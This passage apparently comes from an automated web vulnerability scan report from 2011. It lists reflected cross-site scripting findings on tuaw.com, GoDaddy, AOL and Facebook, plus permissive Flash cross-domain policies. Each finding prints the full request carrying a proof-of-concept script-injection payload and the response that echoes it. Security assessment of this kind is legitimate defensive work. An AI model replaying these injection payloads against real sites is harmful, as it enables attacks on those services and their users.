<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
" ;
s_265.linkInternalFilters="javascript:,popeater.com";
    s_265.prop2="news";
    s_265.prop1="popeater";
    s_265.prop6custom="";
    s_265.prop12= "http://www.popeater.com/?6d2e1"-alert(1)-"80c66c7340=1";
    s_265.channel="us.newspop";
    s_265.disablepihost=false;
    s_265.disablepipath=false;
    s_265.mmxtitle="";
    s_265.mmxcustom="";
    s_265.mmxgo=true;
s_265.t
...[SNIP]...

2.46. http://www.tuaw.com/hub/app-reviews [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tuaw.com
Path:   /hub/app-reviews

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a40b1"-alert(1)-"ce34c6a708f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hub/app-reviews?a40b1"-alert(1)-"ce34c6a708f=1 HTTP/1.1
Host: www.tuaw.com
Proxy-Connection: keep-alive
Referer: http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size7b4de%22%3E%3Cscript%3Ealert(1)%3C/script%3E118786fa1f1=300x250
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 13:06:21 GMT
Server: Apache/2.2
Cache-Control: max-age=60
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 14:06:21 GMT; path=/
Content-Type: text/html
Content-Length: 32731

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>iPhone and iPod touc
...[SNIP]...
l="wb.tuaw";
s_265.pageType="";
s_265.linkInternalFilters="javascript:,tuaw.com";
s_265.mmxgo = true;
s_265.prop1="Tech";
s_265.prop2="show-hub-apps";
s_265.prop12="http://www.tuaw.com/hub/app-reviews?a40b1"-alert(1)-"ce34c6a708f=1";
s_265.prop16="TUAW";
s_265.prop17="";
s_265.prop18="";
s_265.prop19="";
s_265.prop20="";
s_265.prop21="mtc";
s_265.prop22="16";

var s_code=s_265.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

2.47. https://www.godaddy.com/gdshop/hosting/landing.asp [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /gdshop/hosting/landing.asp

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 4ed38<script>alert(1)</script>672c0d44255 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /gdshop/hosting/landing.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)4ed38<script>alert(1)</script>672c0d44255
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 16678
Content-Type: text/html
Expires: Thu, 28 Apr 2011 12:17:59 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: traffic=referringdomain=&referringpath=&shopper=&querystring=msvar%3Dtrue&server=M1PWCORPWEB174&isc=&privatelabelid=1&page=%2Fgdshop%2Fbrowser%5Fupdate%2Easp&sitename=www%2Egodaddy%2Ecom&clientip=173%2E193%2E214%2E243&status=200+OK&referrer=&cookies=1; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Thu, 12-May-2011 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQETSARRC=MOIOEHOALFKFLEHAKEPOPGGK; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:58 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<title>Browser Update Page</title>
<meta http-equiv="Content-T
...[SNIP]...
</B>Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)4ed38<script>alert(1)</script>672c0d44255</b>
...[SNIP]...

2.48. https://www.godaddy.com/gdshop/registrar/search.asp [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /gdshop/registrar/search.asp

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 7508f<script>alert(1)</script>c497b79206d was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /gdshop/registrar/search.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)7508f<script>alert(1)</script>c497b79206d
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 16678
Content-Type: text/html
Expires: Thu, 28 Apr 2011 12:17:46 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: traffic=referringdomain=&referringpath=&shopper=&querystring=msvar%3Dtrue&server=M1PWCORPWEB174&isc=&privatelabelid=1&page=%2Fgdshop%2Fbrowser%5Fupdate%2Easp&sitename=www%2Egodaddy%2Ecom&clientip=173%2E193%2E214%2E243&status=200+OK&referrer=&cookies=1; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Thu, 12-May-2011 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQETSARRC=AMIOEHOAKNNAOPGJAGICKMHH; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:45 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<title>Browser Update Page</title>
<meta http-equiv="Content-T
...[SNIP]...
</B>Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)7508f<script>alert(1)</script>c497b79206d</b>
...[SNIP]...

2.49. https://www.godaddy.com/gdshop/website.asp [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /gdshop/website.asp

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 55b68<script>alert(1)</script>34586a0b13b was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /gdshop/website.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)55b68<script>alert(1)</script>34586a0b13b
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 16678
Content-Type: text/html
Expires: Thu, 28 Apr 2011 12:17:42 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: traffic=referringdomain=&referringpath=&shopper=&querystring=msvar%3Dtrue&server=M1PWCORPWEB174&isc=&privatelabelid=1&page=%2Fgdshop%2Fbrowser%5Fupdate%2Easp&sitename=www%2Egodaddy%2Ecom&clientip=173%2E193%2E214%2E243&status=200+OK&referrer=&cookies=1; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Thu, 12-May-2011 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQETSARRC=FLIOEHOAOGCDEGEAJKDIKAPM; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:42 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<title>Browser Update Page</title>
<meta http-equiv="Content-T
...[SNIP]...
</B>Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)55b68<script>alert(1)</script>34586a0b13b</b>
...[SNIP]...

2.50. http://www.aol.com/ [dlact cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /

Issue detail

The value of the dlact cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a1124"-alert(1)-"6a0d04d96d1 was submitted in the dlact cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_pers=%20s_getnr%3D1304574981881-Repeat%7C1367646981881%3B%20s_nrgvo%3DRepeat%7C1367646981882%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rrpmo1=rr1~1~1304556981389~0; stips5=1; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; dlact=dl2a1124"-alert(1)-"6a0d04d96d1

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:56:45 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-24-45.asset.aol.com
Content-Type: text/html;;charset=utf-8
Set-Cookie: JSESSIONID=47F3597F5AADCEB36B262F261CE5067A; Path=/aol
Content-Length: 63405

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...
<script type="text/javascript">
var dlImps = new Array();dlImps["dl1"]=true;
var dlact = "dl2a1124"-alert(1)-"6a0d04d96d1";
var dlduration = 10000;
var dloverrided = false;
var dlcurr = 1;
var dltotal = 13;
var paramslot = "dynamiclead";
var dloffset = 0;
var ftmslo
...[SNIP]...

2.51. http://www.aol.com/ [rrpmo1 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /

Issue detail

The value of the rrpmo1 cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d687"-alert(1)-"65e99ea59a8 was submitted in the rrpmo1 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_pers=%20s_getnr%3D1304574981881-Repeat%7C1367646981881%3B%20s_nrgvo%3DRepeat%7C1367646981882%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rrpmo1=rr1~1~1304556981389~05d687"-alert(1)-"65e99ea59a8; stips5=1; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; dlact=dl2

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:56:45 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-24-45.asset.aol.com
Content-Type: text/html;;charset=utf-8
Set-Cookie: JSESSIONID=5BD36E2786B24B66765E62769A9E47BB; Path=/aol
Content-Length: 63383

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...
<script type="text/javascript">
var origUrl="http%3A%2F%2Fwww.aol.com%2F";
var ae_url="https://www.aol.com/aimexpress.jsp";
cookies.set("rrpmo1","rr1~2~1304556981389~05d687"-alert(1)-"65e99ea59a8");</script>
...[SNIP]...

2.52. http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259 [REST URL parameter 3]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /people/Alexander-Bucky-Jordan/1242845259

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e76bc<img%20src%3da%20onerror%3dalert(1)>b0233c9330b was submitted in the REST URL parameter 3. This input was echoed as e76bc<img src=a onerror=alert(1)>b0233c9330b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /people/Alexander-Bucky-Jordan/1242845259e76bc<img%20src%3da%20onerror%3dalert(1)>b0233c9330b HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 302 Found
Location: /1242845259e76bc<img src=a onerror=alert(1)>b0233c9330b
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.153.41
Connection: close
Date: Thu, 05 May 2011 11:43:12 GMT
Content-Length: 55

/1242845259e76bc<img src=a onerror=alert(1)>b0233c9330b

2.53. http://www.facebook.com/people/Bucky-Jordan%20/100000824820783 [REST URL parameter 3]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /people/Bucky-Jordan%20/100000824820783

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1c030<img%20src%3da%20onerror%3dalert(1)>5ccc611056 was submitted in the REST URL parameter 3. This input was echoed as 1c030<img src=a onerror=alert(1)>5ccc611056 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /people/Bucky-Jordan%20/1000008248207831c030<img%20src%3da%20onerror%3dalert(1)>5ccc611056 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
X-Purpose: : preview
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; wd=907x1007

Response

HTTP/1.1 302 Found
Location: /1000008248207831c030<img src=a onerror=alert(1)>5ccc611056
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.195.33
X-Cnection: close
Date: Thu, 05 May 2011 11:44:01 GMT
Content-Length: 59

/1000008248207831c030<img src=a onerror=alert(1)>5ccc611056

2.54. http://www.facebook.com/people/Bucky-Jordan/100000824820783 [REST URL parameter 3]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /people/Bucky-Jordan/100000824820783

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 41583<img%20src%3da%20onerror%3dalert(1)>ab0e5e0e0bd was submitted in the REST URL parameter 3. This input was echoed as 41583<img src=a onerror=alert(1)>ab0e5e0e0bd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /people/Bucky-Jordan/10000082482078341583<img%20src%3da%20onerror%3dalert(1)>ab0e5e0e0bd HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: /10000082482078341583<img src=a onerror=alert(1)>ab0e5e0e0bd
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.236.106
X-Cnection: close
Date: Thu, 05 May 2011 02:52:12 GMT
Content-Length: 60

/10000082482078341583<img src=a onerror=alert(1)>ab0e5e0e0bd

2.55. http://www.facebook.com/people/Bucky-Jordan/100000824820783/x22 [REST URL parameter 4]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /people/Bucky-Jordan/100000824820783/x22

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a46e0<img%20src%3da%20onerror%3dalert(1)>3df2a38ae45 was submitted in the REST URL parameter 4. This input was echoed as a46e0<img src=a onerror=alert(1)>3df2a38ae45 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /people/Bucky-Jordan/100000824820783/x22a46e0<img%20src%3da%20onerror%3dalert(1)>3df2a38ae45 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 302 Found
Location: /x22a46e0<img src=a onerror=alert(1)>3df2a38ae45
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.147.43
Connection: close
Date: Thu, 05 May 2011 11:43:07 GMT
Content-Length: 48

/x22a46e0<img src=a onerror=alert(1)>3df2a38ae45

3. Flash cross-domain policy
There are 26 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


3.1. http://www.aolcdn.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aolcdn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.aolcdn.com

Response

HTTP/1.0 200 OK
Last-Modified: Fri, 13 Feb 2009 16:24:41 GMT
Mime-Version: 1.0
Server: AOLserver/4.0.10
Content-Type: text/xml
Date: Thu, 05 May 2011 00:58:56 GMT
Content-Length: 421
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSche
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

3.2. http://www.everydayhealth.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.everydayhealth.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.everydayhealth.com

Response

HTTP/1.1 200 OK
Content-Length: 369
Content-Type: text/xml
Last-Modified: Fri, 22 Apr 2011 15:55:46 GMT
Accept-Ranges: bytes
ETag: "02df0bd51cc1:3644"
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
Date: Thu, 05 May 2011 10:56:31 GMT
Connection: close

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!--used for flash slideshows -->
<cross-domain-policy>
   <site-control permi
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

3.3. http://www.huffingtonpost.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.huffingtonpost.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.8 (Unix)
Last-Modified: Thu, 01 Jul 2010 13:55:20 GMT
ETag: "13598ce-fd-48a53d22e2200"
Content-Type: application/xml
Date: Thu, 05 May 2011 00:58:42 GMT
Content-Length: 253
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
